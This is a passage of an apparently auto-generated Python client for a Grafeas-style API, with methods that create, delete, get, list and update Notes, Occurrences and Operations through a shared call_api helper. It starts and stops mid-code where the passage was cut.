    (data) = self.create_occurrence_with_http_info(parent, body, **kwargs)  # noqa: E501
    return data
def create_occurrence_with_http_info(self, parent, body, **kwargs):  # noqa: E501
    """Creates a new `Occurrence`. Use this method to create `Occurrences` for a resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_occurrence_with_http_info(parent, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str parent: This field contains the project Id for example: \"projects/{project_id}\" (required)
    :param ApiOccurrence body: The occurrence to be inserted. (required)
    :return: ApiOccurrence
             If the method is called asynchronously,
             returns the request thread.
    """
    # Arguments this endpoint accepts, plus the transport-control
    # kwargs shared by every generated method.
    all_params = ['parent', 'body']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject any keyword argument the endpoint does not understand.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_occurrence" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'parent' is set
    if ('parent' not in params or
            params['parent'] is None):
        raise ValueError("Missing the required parameter `parent` when calling `create_occurrence`")  # noqa: E501
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `create_occurrence`")  # noqa: E501

    collection_formats = {}

    # Split validated arguments into the path / query / header / form /
    # body buckets expected by ApiClient.call_api.
    path_params = {}
    if 'parent' in params:
        path_params['parent'] = params['parent']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/v1alpha1/{parent=projects/*}/occurrences', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiOccurrence',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def create_operation(self, parent, body, **kwargs):  # noqa: E501
    """Creates a new `Operation`.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_operation(parent, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str parent: The projectId that this operation should be created under. (required)
    :param ApiCreateOperationRequest body: (required)
    :return: GooglelongrunningOperation
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Async: hand the request thread straight back to the caller.
        return self.create_operation_with_http_info(parent, body, **kwargs)  # noqa: E501
    # Sync: unwrap the data from the full http-info response.
    (data) = self.create_operation_with_http_info(parent, body, **kwargs)  # noqa: E501
    return data
def create_operation_with_http_info(self, parent, body, **kwargs):  # noqa: E501
    """Creates a new `Operation`.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.create_operation_with_http_info(parent, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str parent: The projectId that this operation should be created under. (required)
    :param ApiCreateOperationRequest body: (required)
    :return: GooglelongrunningOperation
             If the method is called asynchronously,
             returns the request thread.
    """
    # Arguments this endpoint accepts, plus the transport-control
    # kwargs shared by every generated method.
    all_params = ['parent', 'body']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject any keyword argument the endpoint does not understand.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_operation" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'parent' is set
    if ('parent' not in params or
            params['parent'] is None):
        raise ValueError("Missing the required parameter `parent` when calling `create_operation`")  # noqa: E501
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `create_operation`")  # noqa: E501

    collection_formats = {}

    # Split validated arguments into the path / query / header / form /
    # body buckets expected by ApiClient.call_api.
    path_params = {}
    if 'parent' in params:
        path_params['parent'] = params['parent']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/v1alpha1/{parent=projects/*}/operations', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='GooglelongrunningOperation',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def delete_note(self, name, **kwargs):  # noqa: E501
    """Deletes the given `Note` from the system.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_note(name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The name of the note in the form of \"providers/{provider_id}/notes/{NOTE_ID}\" (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Async: hand the request thread straight back to the caller.
        return self.delete_note_with_http_info(name, **kwargs)  # noqa: E501
    # Sync: unwrap the data from the full http-info response.
    (data) = self.delete_note_with_http_info(name, **kwargs)  # noqa: E501
    return data
def delete_note_with_http_info(self, name, **kwargs):  # noqa: E501
    """Deletes the given `Note` from the system.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_note_with_http_info(name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The name of the note in the form of \"providers/{provider_id}/notes/{NOTE_ID}\" (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Arguments this endpoint accepts, plus the transport-control
    # kwargs shared by every generated method.
    all_params = ['name']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject any keyword argument the endpoint does not understand.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_note" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'name' is set
    if ('name' not in params or
            params['name'] is None):
        raise ValueError("Missing the required parameter `name` when calling `delete_note`")  # noqa: E501

    collection_formats = {}

    # Split validated arguments into the path / query / header / form /
    # body buckets expected by ApiClient.call_api.
    path_params = {}
    if 'name' in params:
        path_params['name'] = params['name']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/v1alpha1/{name=projects/*/notes/*}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def delete_occurrence(self, name, **kwargs):  # noqa: E501
    """Deletes the given `Occurrence` from the system. Use this when an `Occurrence` is no longer applicable for the given resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_occurrence(name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The name of the occurrence in the form of \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\" (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Async: hand the request thread straight back to the caller.
        return self.delete_occurrence_with_http_info(name, **kwargs)  # noqa: E501
    # Sync: unwrap the data from the full http-info response.
    (data) = self.delete_occurrence_with_http_info(name, **kwargs)  # noqa: E501
    return data
def delete_occurrence_with_http_info(self, name, **kwargs):  # noqa: E501
    """Deletes the given `Occurrence` from the system. Use this when an `Occurrence` is no longer applicable for the given resource.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_occurrence_with_http_info(name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The name of the occurrence in the form of \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\" (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Arguments this endpoint accepts, plus the transport-control
    # kwargs shared by every generated method.
    all_params = ['name']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Reject any keyword argument the endpoint does not understand.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_occurrence" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'name' is set
    if ('name' not in params or
            params['name'] is None):
        raise ValueError("Missing the required parameter `name` when calling `delete_occurrence`")  # noqa: E501

    collection_formats = {}

    # Split validated arguments into the path / query / header / form /
    # body buckets expected by ApiClient.call_api.
    path_params = {}
    if 'name' in params:
        path_params['name'] = params['name']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/v1alpha1/{name=projects/*/occurrences/*}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_note(self, name, **kwargs):  # noqa: E501
    """Returns the requested `Note`.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_note(name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: The name of the note in the form of \"providers/{provider_id}/notes/{NOTE_ID}\" (required)
    :return: ApiNote
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Async: hand the request thread straight back to the caller.
        return self.get_note_with_http_info(name, **kwargs)  # noqa: E501
    # Sync: unwrap the data from the full http-info response.
    (data) = self.get_note_with_http_info(name, **kwargs)  # noqa: E501
    return data
def get_note_with_http_info(self, name, **kwargs):  # noqa: E501
    """Returns the requested `Note`. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_note_with_http_info(name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: The name of the note in the form of \"providers/{provider_id}/notes/{NOTE_ID}\" (required)
    :return: ApiNote
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted from the caller.
    all_params = ['name']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() is used as the params dict, so the local variable
    # names above are load-bearing — do not rename them.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_note" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'name' is set
    if ('name' not in params or
            params['name'] is None):
        raise ValueError("Missing the required parameter `name` when calling `get_note`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'name' in params:
        path_params['name'] = params['name']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = []  # noqa: E501
    # Delegate the actual HTTP round trip to the shared ApiClient.
    return self.api_client.call_api(
        '/v1alpha1/{name=projects/*/notes/*}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiNote',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_occurrence(self, name, **kwargs):  # noqa: E501
    """Returns the requested `Occurrence`.  # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread instead of the response body.
    >>> thread = api.get_occurrence(name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: The name of the occurrence of the form \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\" (required)
    :return: ApiOccurrence
        If the method is called asynchronously,
        returns the request thread.
    """
    # Sync and async paths both reduce to the same delegate call:
    # with async_req set the delegate already returns the thread.
    kwargs['_return_http_data_only'] = True
    return self.get_occurrence_with_http_info(name, **kwargs)  # noqa: E501
def get_occurrence_with_http_info(self, name, **kwargs):  # noqa: E501
    """Returns the requested `Occurrence`. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_occurrence_with_http_info(name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: The name of the occurrence of the form \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\" (required)
    :return: ApiOccurrence
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted from the caller.
    all_params = ['name']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() is used as the params dict, so the local variable
    # names above are load-bearing — do not rename them.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_occurrence" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'name' is set
    if ('name' not in params or
            params['name'] is None):
        raise ValueError("Missing the required parameter `name` when calling `get_occurrence`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'name' in params:
        path_params['name'] = params['name']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = []  # noqa: E501
    # Delegate the actual HTTP round trip to the shared ApiClient.
    return self.api_client.call_api(
        '/v1alpha1/{name=projects/*/occurrences/*}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiOccurrence',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_occurrence_note(self, name, **kwargs):  # noqa: E501
    """Gets the `Note` attached to the given `Occurrence`.  # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread instead of the response body.
    >>> thread = api.get_occurrence_note(name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: The name of the occurrence in the form \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\" (required)
    :return: ApiNote
        If the method is called asynchronously,
        returns the request thread.
    """
    # Sync and async paths both reduce to the same delegate call:
    # with async_req set the delegate already returns the thread.
    kwargs['_return_http_data_only'] = True
    return self.get_occurrence_note_with_http_info(name, **kwargs)  # noqa: E501
def get_occurrence_note_with_http_info(self, name, **kwargs):  # noqa: E501
    """Gets the `Note` attached to the given `Occurrence`. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_occurrence_note_with_http_info(name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: The name of the occurrence in the form \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\" (required)
    :return: ApiNote
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted from the caller.
    all_params = ['name']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() is used as the params dict, so the local variable
    # names above are load-bearing — do not rename them.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_occurrence_note" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'name' is set
    if ('name' not in params or
            params['name'] is None):
        raise ValueError("Missing the required parameter `name` when calling `get_occurrence_note`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'name' in params:
        path_params['name'] = params['name']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = []  # noqa: E501
    # Delegate the actual HTTP round trip to the shared ApiClient.
    return self.api_client.call_api(
        '/v1alpha1/{name=projects/*/occurrences/*}/notes', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiNote',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def list_note_occurrences(self, name, **kwargs):  # noqa: E501
    """Lists `Occurrences` referencing the specified `Note`. Use this method to get all occurrences referencing your `Note` across all your customer projects.  # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread instead of the response body.
    >>> thread = api.list_note_occurrences(name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: The name field will contain the note name for example: \"provider/{provider_id}/notes/{note_id}\" (required)
    :param str filter: The filter expression.
    :param int page_size: Number of notes to return in the list.
    :param str page_token: Token to provide to skip to a particular spot in the list.
    :return: ApiListNoteOccurrencesResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Sync and async paths both reduce to the same delegate call:
    # with async_req set the delegate already returns the thread.
    kwargs['_return_http_data_only'] = True
    return self.list_note_occurrences_with_http_info(name, **kwargs)  # noqa: E501
def list_note_occurrences_with_http_info(self, name, **kwargs):  # noqa: E501
    """Lists `Occurrences` referencing the specified `Note`. Use this method to get all occurrences referencing your `Note` across all your customer projects. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.list_note_occurrences_with_http_info(name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: The name field will contain the note name for example: \"provider/{provider_id}/notes/{note_id}\" (required)
    :param str filter: The filter expression.
    :param int page_size: Number of notes to return in the list.
    :param str page_token: Token to provide to skip to a particular spot in the list.
    :return: ApiListNoteOccurrencesResponse
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted from the caller.
    all_params = ['name', 'filter', 'page_size', 'page_token']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() is used as the params dict, so the local variable
    # names above are load-bearing — do not rename them.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_note_occurrences" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'name' is set
    if ('name' not in params or
            params['name'] is None):
        raise ValueError("Missing the required parameter `name` when calling `list_note_occurrences`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'name' in params:
        path_params['name'] = params['name']  # noqa: E501
    # Optional paging/filtering arguments become query-string entries.
    query_params = []
    if 'filter' in params:
        query_params.append(('filter', params['filter']))  # noqa: E501
    if 'page_size' in params:
        query_params.append(('page_size', params['page_size']))  # noqa: E501
    if 'page_token' in params:
        query_params.append(('page_token', params['page_token']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = []  # noqa: E501
    # Delegate the actual HTTP round trip to the shared ApiClient.
    return self.api_client.call_api(
        '/v1alpha1/{name=projects/*/notes/*}/occurrences', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiListNoteOccurrencesResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def list_notes(self, parent, **kwargs):  # noqa: E501
    """Lists all `Notes` for a given project.  # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread instead of the response body.
    >>> thread = api.list_notes(parent, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str parent: This field contains the project ID for example: \"projects/{project_id}\". (required)
    :param str filter: The filter expression.
    :param int page_size: Number of notes to return in the list.
    :param str page_token: Token to provide to skip to a particular spot in the list.
    :return: ApiListNotesResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Sync and async paths both reduce to the same delegate call:
    # with async_req set the delegate already returns the thread.
    kwargs['_return_http_data_only'] = True
    return self.list_notes_with_http_info(parent, **kwargs)  # noqa: E501
def list_notes_with_http_info(self, parent, **kwargs):  # noqa: E501
    """Lists all `Notes` for a given project. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.list_notes_with_http_info(parent, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str parent: This field contains the project ID for example: \"projects/{project_id}\". (required)
    :param str filter: The filter expression.
    :param int page_size: Number of notes to return in the list.
    :param str page_token: Token to provide to skip to a particular spot in the list.
    :return: ApiListNotesResponse
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted from the caller.
    all_params = ['parent', 'filter', 'page_size', 'page_token']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() is used as the params dict, so the local variable
    # names above are load-bearing — do not rename them.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_notes" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'parent' is set
    if ('parent' not in params or
            params['parent'] is None):
        raise ValueError("Missing the required parameter `parent` when calling `list_notes`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'parent' in params:
        path_params['parent'] = params['parent']  # noqa: E501
    # Optional paging/filtering arguments become query-string entries.
    query_params = []
    if 'filter' in params:
        query_params.append(('filter', params['filter']))  # noqa: E501
    if 'page_size' in params:
        query_params.append(('page_size', params['page_size']))  # noqa: E501
    if 'page_token' in params:
        query_params.append(('page_token', params['page_token']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = []  # noqa: E501
    # Delegate the actual HTTP round trip to the shared ApiClient.
    return self.api_client.call_api(
        '/v1alpha1/{parent=projects/*}/notes', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiListNotesResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def list_occurrences(self, parent, **kwargs):  # noqa: E501
    """Lists active `Occurrences` for a given project matching the filters.  # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread instead of the response body.
    >>> thread = api.list_occurrences(parent, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str parent: This contains the project Id for example: projects/{project_id}. (required)
    :param str filter: The filter expression.
    :param int page_size: Number of occurrences to return in the list.
    :param str page_token: Token to provide to skip to a particular spot in the list.
    :return: ApiListOccurrencesResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Sync and async paths both reduce to the same delegate call:
    # with async_req set the delegate already returns the thread.
    kwargs['_return_http_data_only'] = True
    return self.list_occurrences_with_http_info(parent, **kwargs)  # noqa: E501
def list_occurrences_with_http_info(self, parent, **kwargs):  # noqa: E501
    """Lists active `Occurrences` for a given project matching the filters. # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.list_occurrences_with_http_info(parent, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str parent: This contains the project Id for example: projects/{project_id}. (required)
    :param str filter: The filter expression.
    :param int page_size: Number of occurrences to return in the list.
    :param str page_token: Token to provide to skip to a particular spot in the list.
    :return: ApiListOccurrencesResponse
    If the method is called asynchronously,
    returns the request thread.
    """
    # Whitelist of keyword arguments accepted from the caller.
    all_params = ['parent', 'filter', 'page_size', 'page_token']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() is used as the params dict, so the local variable
    # names above are load-bearing — do not rename them.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_occurrences" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'parent' is set
    if ('parent' not in params or
            params['parent'] is None):
        raise ValueError("Missing the required parameter `parent` when calling `list_occurrences`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'parent' in params:
        path_params['parent'] = params['parent']  # noqa: E501
    # Optional paging/filtering arguments become query-string entries.
    query_params = []
    if 'filter' in params:
        query_params.append(('filter', params['filter']))  # noqa: E501
    if 'page_size' in params:
        query_params.append(('page_size', params['page_size']))  # noqa: E501
    if 'page_token' in params:
        query_params.append(('page_token', params['page_token']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501
    # Authentication setting
    auth_settings = []  # noqa: E501
    # Delegate the actual HTTP round trip to the shared ApiClient.
    return self.api_client.call_api(
        '/v1alpha1/{parent=projects/*}/occurrences', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ApiListOccurrencesResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_note(self, name, body, **kwargs):  # noqa: E501
    """Updates an existing `Note`.  # noqa: E501

    Synchronous by default; pass async_req=True to get the request
    thread instead of the response body.
    >>> thread = api.update_note(name, body, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: The name of the note. Should be of the form \"projects/{provider_id}/notes/{note_id}\". (required)
    :param ApiNote body: The updated note. (required)
    :return: ApiNote
        If the method is called asynchronously,
        returns the request thread.
    """
